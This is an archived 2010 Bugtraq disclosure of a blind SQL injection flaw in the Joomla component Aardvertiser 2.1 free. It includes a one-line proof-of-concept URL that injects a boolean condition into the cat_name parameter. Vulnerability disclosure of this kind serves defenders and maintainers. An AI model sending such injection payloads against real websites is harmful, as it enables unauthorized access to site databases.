lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <201009071648.o87GmeHK019146@www3.securityfocus.com> Date: Tue, 7 Sep 2010 10:48:40 -0600 From: sattler@...idmedia.de To: bugtraq@...urityfocus.com Subject: Joomla Component Aardvertiser 2.1 free Blind SQL Injection Vulnerability # Exploit Title: Joomla Component Aardvertiser 2.1 free Blind SQL Injection Vulnerability # Date: 07.09.2010 # Author: Stephan Sattler // www.solidmedia.de # Software Link: http://sourceforge.net/projects/aardvertiser/files/com_aardvertiser%20V2.1.1%20Free/com_aardvertiserfree.zip/download # Version: 2.1 free [ Vulnerability//PoC ] http://www.site.com/joomlapath/index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view